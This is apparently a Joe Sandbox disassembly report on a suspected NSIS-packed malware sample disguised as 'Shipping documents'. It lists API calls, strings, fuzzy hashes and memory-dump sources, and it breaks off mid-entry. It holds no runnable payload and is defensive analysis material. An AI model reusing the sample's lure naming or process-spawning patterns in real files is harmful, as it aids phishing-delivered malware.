                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]
                                      • API String ID: 2900126502-461813615
                                      • Opcode ID: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
                                      • Instruction ID: 3caf73f0ff98a748f1a35ad4b0faf92cdaa7f83aa24985268d6d9c0dc650f438
                                      • Opcode Fuzzy Hash: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
                                      • Instruction Fuzzy Hash: C93105B12012117AE7206B258D99FAB3A5CEF45748F16053AF903F62D3E63D9C11867C
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                      • GlobalFree.KERNEL32(?), ref: 00402C7E
                                      • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                      • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00402CD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
                                      • API String ID: 2667972263-2461694523
                                      • Opcode ID: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
                                      • Instruction ID: 23d93ea21af668beabbcb9178b0b7634ed911faf56d8c64a437eebf92f001ab7
                                      • Opcode Fuzzy Hash: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
                                      • Instruction Fuzzy Hash: B2310471508351ABD310AF65CD48E1FBBE8AF89714F100A3EF5A1772D2C37899018BAA
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                      • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
                                      • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE
                                      Strings
                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D44
                                      • *?|<>/":, xrefs: 00406DA1
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D3D, 00406D3F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                      • API String ID: 589700163-879122614
                                      • Opcode ID: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
                                      • Instruction ID: 9b03febb742ef4485f2caa0616bf8b5dba6ff04d2a2b11022b5674ddd7f14081
                                      • Opcode Fuzzy Hash: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
                                      • Instruction Fuzzy Hash: 4E110211B0022566DA306B2A9C4097B72E8DFA9761746443BF9C6A32C0F77D8CA1D2B8
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 73471A97
                                      • GetModuleHandleA.KERNEL32(KERNEL32), ref: 73471AA4
                                      • lstrcpyA.KERNEL32(?,IsWow64Process2), ref: 73471AB5
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 73471AC0
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 73471AED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                      • Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentHandleModuleProcesslstrcpy
                                      • String ID: IsWow64Process2$KERNEL32
                                      • API String ID: 145496639-1019154776
                                      • Opcode ID: e2b5b2d42c8666c1ff621e1d0e6d83e1f1a817f887966d4b0ebf1b5570ff2cfe
                                      • Instruction ID: b93aaa2384947b5964c879ec492e020f63b133cf57dfd07910a85ae3d8ec3d50
                                      • Opcode Fuzzy Hash: e2b5b2d42c8666c1ff621e1d0e6d83e1f1a817f887966d4b0ebf1b5570ff2cfe
                                      • Instruction Fuzzy Hash: 19014F7260024AABDB09FBB5CC49FFF7BBCEF44101F100055EA06E2140EB24D645C6B5
                                      APIs
                                      • GetCommandLineW.KERNEL32(00000400), ref: 73471031
                                      • lstrcpynW.KERNEL32(?,00000000), ref: 7347103D
                                      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 734710C6
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 734710DA
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 734710E9
                                      • CloseHandle.KERNEL32(?), ref: 734710F9
                                      • CloseHandle.KERNEL32(?), ref: 734710FF
                                      • ExitProcess.KERNEL32 ref: 73471105
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                      • Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Process$CloseExitHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                      • String ID:
                                      • API String ID: 3065505172-0
                                      • Opcode ID: 4fa33c4e264fed3e2cc5864cb62a20ec4536e535640f6f0157f8fb99ab75fdb8
                                      • Instruction ID: cf83bc489a9defd4645894e81f7f87050cd8c92e3e65e25f2c411753b41caa11
                                      • Opcode Fuzzy Hash: 4fa33c4e264fed3e2cc5864cb62a20ec4536e535640f6f0157f8fb99ab75fdb8
                                      • Instruction Fuzzy Hash: EF31F5B2504399AFD7199B55CC44FEB3BFDEB48790F10081AF286E6190D620C944C775
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
                                      • Instruction ID: d6878141ad4b6a1f495ba237af706d2ee8e98f75713b616aff0e98366caa8665
                                      • Opcode Fuzzy Hash: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
                                      • Instruction Fuzzy Hash: 64210775600B059FDB34AF28E94895B7BF8EF05710700CA3AE896A27A1D735EC14CF58
                                      APIs
                                      • ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$ByteCharMultiPointerWide$Read
                                      • String ID: 9
                                      • API String ID: 1439708474-2366072709
                                      • Opcode ID: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
                                      • Instruction ID: c0364eb4a24137c8a00bba018ae5694ccc63d4c43f2b92d4ab62ccb683855c39
                                      • Opcode Fuzzy Hash: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
                                      • Instruction Fuzzy Hash: FD513B71618301AFD724DF11CA48A2BB7E8BFD5304F00483FF985A62D1DBB9D9458B66
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056F3
                                      • GetMessagePos.USER32 ref: 004056FB
                                      • ScreenToClient.USER32(?,?), ref: 00405715
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405729
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
                                      • Instruction ID: c2e7ed3a8a7ffde0c91d4cd6f33517ea70e65294e07f2b992d5a249d380e7f5b
                                      • Opcode Fuzzy Hash: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
                                      • Instruction Fuzzy Hash: 01014C7190020DBBEB119FA4CC45BEEBBB9EB44720F104226FA51B61E0D7B59A419F54
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040366D
                                      • MulDiv.KERNEL32(00107F18,00000064,00107F18), ref: 00403695
                                      • wsprintfW.USER32 ref: 004036A5
                                      • SetWindowTextW.USER32(?,?), ref: 004036B5
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036C7
                                      Strings
                                      • verifying installer: %d%%, xrefs: 0040369F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: a45adb16feadd7563508c9bdb29ee39ed6203ff3f9d3482269176a8409c36fca
                                      • Instruction ID: 5c883eac817cb3b9f0e850005900bd2bca04ae763b88d1ec11a0ecb90196ae4f
                                      • Opcode Fuzzy Hash: a45adb16feadd7563508c9bdb29ee39ed6203ff3f9d3482269176a8409c36fca
                                      • Instruction Fuzzy Hash: 87013671940209BBDF249FA0DD49FAA3B78A700705F008439F606B51E1DBB59A55CF59
                                      APIs
                                      • lstrlenW.KERNEL32(perchlorination: Installing,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,perchlorination: Installing,?,?,?,?,?), ref: 0040561F
                                      • wsprintfW.USER32 ref: 0040562C
                                      • SetDlgItemTextW.USER32(?,perchlorination: Installing), ref: 00405643
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$perchlorination: Installing
                                      • API String ID: 3540041739-3319793313
                                      • Opcode ID: 6fe9c990381cc4b93cba0025ee8d74cf264b947145ebdc280f7d8df25bcd82a5
                                      • Instruction ID: ddca7360d09b2edd05df8fb08f039e75c7842db061d31d06a5ac0fb1d0c25846
                                      • Opcode Fuzzy Hash: 6fe9c990381cc4b93cba0025ee8d74cf264b947145ebdc280f7d8df25bcd82a5
                                      • Instruction Fuzzy Hash: 072106337402242BD724A9799C40FAB729DDBC1364F01473AFD6AF31D1E9399C1885A4
                                      APIs
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                      • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                      • RegCloseKey.ADVAPI32(?), ref: 00401507
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CloseEnum$DeleteValue
                                      • String ID:
                                      • API String ID: 1354259210-0
                                      • Opcode ID: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
                                      • Instruction ID: 21b5a5252aa063403de6f9026dc2c812d9767c74370f87ead0cd0c39fa3adcf8
                                      • Opcode Fuzzy Hash: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
                                      • Instruction Fuzzy Hash: 3F218032108244BBD7219F51DC08FABBBADEFD9344F01043AF989A11B0D3399A14DA6A
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401F03
                                      • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                      • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                      • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                      • DeleteObject.GDI32(00000000), ref: 00401FA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
                                      • Instruction ID: 799bb538699f0f6bb00644a204e03bb935fb5af8a8b8547909695eab986b8c59
                                      • Opcode Fuzzy Hash: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
                                      • Instruction Fuzzy Hash: 2A218072609302AFD340DF64DD85A6BB7E8EB88305F04093EF945E62A1D678DD40DB5A
                                      APIs
                                      • GetDC.USER32 ref: 00401FB9
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                      • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                        • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
